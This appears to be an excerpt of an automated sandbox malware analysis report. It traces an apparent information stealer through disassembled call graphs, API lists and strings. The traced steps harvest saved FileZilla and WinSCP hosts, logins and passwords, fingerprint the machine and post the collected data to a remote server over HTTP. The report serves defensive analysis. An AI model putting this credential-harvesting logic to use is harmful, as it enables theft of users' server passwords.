                                        • Part of subcall function 002FF8A0: lstrlen.KERNEL32(002F5B05,00000000,?,?,002F5B05,003101E9), ref: 002FF8AB
                                        • Part of subcall function 002FF8A0: lstrcpy.KERNEL32(00000000,002F5B05), ref: 002FF8E2
                                      • strtok_s.MSVCRT ref: 002FBD47
                                      • lstrlen.KERNEL32(00000000), ref: 002FBD5A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$File$AllocHeapLocalstrtok_s$AllocateCloseCreateFolderHandlePathProcessReadSizemallocstrncpy
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                      • API String ID: 2446915026-935134978
                                      • Opcode ID: 9f9fb75a9a4368811760b3f5a3355f488cd8e781ecb1925d90a18ce818bb6dfd
                                      • Instruction ID: e9361d88f377b4c2d4c0e043860e9984da993fd959c0aecaff02e47b5878780c
                                      • Opcode Fuzzy Hash: 9f9fb75a9a4368811760b3f5a3355f488cd8e781ecb1925d90a18ce818bb6dfd
                                      • Instruction Fuzzy Hash: 34B1757192010D7ADB55FBA0DE56DFEB77CEF25780F444034F602A1192EF206A69CE61
                                      Function 002F45D0 Relevance: 60.2, APIs: 26, Strings: 8, Instructions: 696networkstringmemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 729 2f45d0-2f45fe call 2ff810 call 2ff850 call 2f3d70 735 2f4603-2f46ae call 300df0 call 2ffa50 lstrlen call 2ffa50 call 300df0 call 2ff810 * 4 StrCmpCA 729->735 752 2f46b7-2f46bc 735->752 753 2f46b0 735->753 754 2f46be-2f46d6 call 2ffa50 InternetOpenA 752->754 755 2f46dc-2f47bd call 300b80 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff940 call 2ff9a0 call 2ff8f0 call 2ff890 * 3 call 2ff9a0 call 2ff940 call 2ff8f0 call 2ff890 * 2 InternetConnectA 752->755 753->752 754->755 760 2f4ded-2f4e2c call 300ab0 * 2 call 2ffa00 * 4 call 2ff850 754->760 755->760 825 2f47c3-2f47f7 HttpOpenRequestA 755->825 788 2f4e31-2f4e81 call 2ff890 * 9 760->788 826 2f47fd-2f4800 825->826 827 2f4de6-2f4de7 InternetCloseHandle 825->827 828 2f4818-2f4d22 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2f1ed0 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffa50 lstrlen call 2ffa50 lstrlen GetProcessHeap RtlAllocateHeap call 2ffa50 lstrlen call 2ffa50 memcpy call 2ffa50 lstrlen memcpy call 2ffa50 lstrlen call 2ffa50 * 2 lstrlen memcpy call 2ffa50 lstrlen call 2ffa50 HttpSendRequestA call 300ab0 HttpQueryInfoA 826->828 829 2f4802-2f4812 InternetSetOptionA 826->829 827->760 1034 2f4d38-2f4d4c call 300a80 828->1034 1035 2f4d24-2f4d33 call 2ff810 828->1035 829->828 1034->1035 1040 2f4d4e-2f4d67 InternetReadFile 1034->1040 1035->788 1041 2f4dbd-2f4dd3 call 2ffa50 StrCmpCA 1040->1041 1042 2f4d69 1040->1042 1047 2f4ddc-2f4de3 InternetCloseHandle 1041->1047 1048 2f4dd5-2f4dd6 ExitProcess 1041->1048 1043 2f4d70-2f4d75 1042->1043 1043->1041 1046 2f4d77-2f4dbb call 2ff9a0 call 2ff8f0 call 2ff890 InternetReadFile 1043->1046 1046->1041 1046->1043 1047->827
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00000001), ref: 002F3DA2
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,?,00000001), ref: 002F3DAF
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,?,00000001), ref: 002F3DBC
                                        • Part of subcall function 002F3D70: lstrlen.KERNEL32(00000000,00000000,0000003C,?,00000001), ref: 002F3DD6
                                        • Part of subcall function 002F3D70: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 002F3DE6
                                      • lstrlen.KERNEL32(00000000), ref: 002F4641
                                        • Part of subcall function 00300DF0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,00000000,?,?,002F4635,?,?,?,?,?,?), ref: 00300E14
                                        • Part of subcall function 00300DF0: GetProcessHeap.KERNEL32(00000000,?,?,002F4635,?,?,?,?,?,?), ref: 00300E23
                                        • Part of subcall function 00300DF0: RtlAllocateHeap.NTDLL(00000000), ref: 00300E2A
                                      • StrCmpCA.SHLWAPI(?,02F43058,003101E9,003101E9,003101E9,003101E9), ref: 002F46A6
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F46CC
                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002F47B0
                                      • HttpOpenRequestA.WININET(00000000,02F431B8,?,02F45FE0,00000000,00000000,?,00000000), ref: 002F47ED
                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002F4812
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                      • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,02F34F90,00000000,?,00313358,00000000,?,?), ref: 002F4C21
                                      • lstrlen.KERNEL32(00000000), ref: 002F4C33
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002F4C45
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002F4C4C
                                      • lstrlen.KERNEL32(00000000), ref: 002F4C5E
                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 002F4C72
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 002F4C8B
                                      • memcpy.MSVCRT(?), ref: 002F4C95
                                      • lstrlen.KERNEL32(00000000), ref: 002F4CA6
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002F4CBF
                                      • memcpy.MSVCRT(?), ref: 002F4CCC
                                      • lstrlen.KERNEL32(00000000,?,00000000), ref: 002F4CE2
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 002F4CF3
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 002F4D1A
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002F4D5F
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002F4DB3
                                      • StrCmpCA.SHLWAPI(00000000,block), ref: 002F4DCB
                                      • ExitProcess.KERNEL32 ref: 002F4DD6
                                      • InternetCloseHandle.WININET(00000000), ref: 002F4DE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$AllocateFileOpenReadRequestlstrcat$BinaryCloseConnectCrackCryptExitHandleInfoOptionQuerySendString
                                      • String ID: ------$"$--$------$ERROR$block$build_id$file_data
                                      • API String ID: 3957834146-1063948816
                                      • Opcode ID: 31a61a2bdf007dd3141a65a2a2df3fbce073c759bae66213772e7dfd84d56491
                                      • Instruction ID: 00717d2d775413aa9c03d13362bb2bc07e599fd953edfd4c864573a7615fe65a
                                      • Opcode Fuzzy Hash: 31a61a2bdf007dd3141a65a2a2df3fbce073c759bae66213772e7dfd84d56491
                                      • Instruction Fuzzy Hash: DC421D72C2010DAEDB55EBA0DD92DFEB778AF14780F508139F61262291DF306A59CF64
                                      Function 002FE3C0 Relevance: 58.1, APIs: 19, Strings: 14, Instructions: 384registrystringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1055 2fe3c0-2fe446 memset * 4 RegOpenKeyExA 1056 2fe47e-2fe4a4 call 2ff890 * 4 1055->1056 1057 2fe448-2fe46e RegGetValueA 1055->1057 1059 2fe4a5-2fe4a8 1057->1059 1060 2fe470-2fe472 1057->1060 1059->1060 1062 2fe4aa-2fe4ac 1059->1062 1060->1056 1063 2fe474-2fe47b RegCloseKey 1060->1063 1065 2fe4ae-2fe4b5 RegCloseKey 1062->1065 1066 2fe4b8-2fe4cd RegOpenKeyExA 1062->1066 1063->1056 1065->1066 1068 2fe859-2fe867 call 2f1050 1066->1068 1069 2fe4d3-2fe4ef RegEnumKeyExA 1066->1069 1072 2fe515-2fe51d call 2ff810 1069->1072 1073 2fe4f1-2fe4f6 1069->1073 1078 2fe522-2fe5d9 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 RegGetValueA call 2ff9a0 call 2ff8f0 call 2ff890 RegGetValueA 1072->1078 1073->1068 1077 2fe4fc-2fe514 RegCloseKey call 2f1050 1073->1077 1101 2fe5db-2fe612 call 301240 call 2ff940 call 2ff8f0 call 2ff890 1078->1101 1102 2fe614-2fe631 call 2ff9a0 call 2ff8f0 1078->1102 1111 2fe637-2fe72c call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 RegGetValueA call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 RegGetValueA call 2ff9a0 call 2ff8f0 call 2ff890 StrCmpCA 1101->1111 1102->1111 1142 2fe72e-2fe75a call 2fdd90 1111->1142 1143 2fe793-2fe7e2 call 2ff9a0 call 2ff8f0 call 2ff890 RegEnumKeyExA 1111->1143 1149 2fe75e-2fe782 call 2ff9a0 call 2ff8f0 call 2ff890 1142->1149 1150 2fe75c 1142->1150 1143->1078 1157 2fe7e8-2fe845 call 2ffa50 lstrlen call 2ffa50 call 2ff810 call 2f1080 call 3042a0 call 2ff890 1143->1157 1149->1143 1164 2fe784-2fe790 call 3014b0 1149->1164 1150->1149 1176 2fe847-2fe84e RegCloseKey 1157->1176 1177 2fe851-2fe854 call 2ff890 1157->1177 1164->1143 1176->1177 1177->1068
                                      APIs
                                      • memset.MSVCRT ref: 002FE3E4
                                      • memset.MSVCRT ref: 002FE3FE
                                      • memset.MSVCRT ref: 002FE40C
                                      • memset.MSVCRT ref: 002FE41A
                                      • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 002FE442
                                      • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 002FE467
                                      • RegCloseKey.ADVAPI32(?), ref: 002FE475
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • RegCloseKey.ADVAPI32(?), ref: 002FE4AF
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 002FE4C9
                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 002FE4E7
                                      • RegCloseKey.ADVAPI32(?), ref: 002FE4FD
                                      • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,003101E9), ref: 002FE58A
                                      • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 002FE5D5
                                      • RegGetValueA.ADVAPI32(?,?,UserName,00000002,00000000,?,?,00000000,?,Login: ,00000000,?,:22), ref: 002FE682
                                      • RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,?,00000000,?,00313408,00000000,?,?), ref: 002FE6F4
                                      • StrCmpCA.SHLWAPI(?,003101E9,00000000,?,Password: ), ref: 002FE724
                                      • RegEnumKeyExA.ADVAPI32(?,?,?,00000104,00000000,00000000,00000000,00000000,00000000,?,00313684), ref: 002FE7D7
                                      • lstrlen.KERNEL32(00000000), ref: 002FE7F1
                                      • RegCloseKey.ADVAPI32(?), ref: 002FE848
                                        • Part of subcall function 002FDD90: GetProcessHeap.KERNEL32(00000008,?), ref: 002FDDD8
                                        • Part of subcall function 002FDD90: RtlAllocateHeap.NTDLL(00000000), ref: 002FDDDF
                                        • Part of subcall function 002FDD90: GetProcessHeap.KERNEL32(00000000,?), ref: 002FDDF4
                                        • Part of subcall function 002FDD90: HeapFree.KERNEL32(00000000), ref: 002FDDFB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Value$CloseHeapmemset$EnumOpenProcesslstrcpylstrlen$AllocateFreelstrcat
                                      • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                      • API String ID: 751369145-2798830873
                                      • Opcode ID: cebd77955f700822d8f9b3d7bcae12cd42b8346600569c43c545751e3317898e
                                      • Instruction ID: 5fb92e3f843c759de9eda4583ae96d81005ee0380f0fdc11af46ba99084fd814
                                      • Opcode Fuzzy Hash: cebd77955f700822d8f9b3d7bcae12cd42b8346600569c43c545751e3317898e
                                      • Instruction Fuzzy Hash: 85D13DB292021DAEDB15EBA0CD91EFEB37CAF54780F404579F605A2191EB706B58CF60
                                      Function 003044B0 Relevance: 48.1, APIs: 2, Strings: 25, Instructions: 834stringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1276 3044b0-304f76 call 2ff810 call 2ff9a0 call 2ff8f0 call 2ff890 call 2f1ec0 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffb60 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 300340 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 3003e0 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 300420 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 GetCurrentProcessId call 301090 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 3005a0 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 300730 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 300900 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffb20 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffae0 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 3002c0 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffc30 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffb60 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffbc0 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffd30 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffde0 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffda0 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffed0 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2fff40 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 300200 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2fffc0 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2fffc0 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffa50 lstrlen call 2ffa50 call 2ff810 call 2f1080 call 3042a0 call 2ff890 * 6
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FFB60: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFB6E
                                        • Part of subcall function 002FFB60: RtlAllocateHeap.NTDLL(00000000), ref: 002FFB75
                                        • Part of subcall function 002FFB60: GetLocalTime.KERNEL32(?), ref: 002FFB81
                                        • Part of subcall function 002FFB60: wsprintfA.USER32 ref: 002FFBAD
                                        • Part of subcall function 00300340: memset.MSVCRT ref: 00300365
                                        • Part of subcall function 00300340: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 00300382
                                        • Part of subcall function 00300340: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,00000000,000000FF), ref: 003003A4
                                        • Part of subcall function 00300340: RegCloseKey.ADVAPI32(?), ref: 003003AE
                                        • Part of subcall function 00300340: CharToOemA.USER32(00000000,?), ref: 003003C2
                                        • Part of subcall function 003003E0: GetCurrentHwProfileA.ADVAPI32(?), ref: 003003EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 00300420: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0030043C
                                        • Part of subcall function 00300420: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00300475
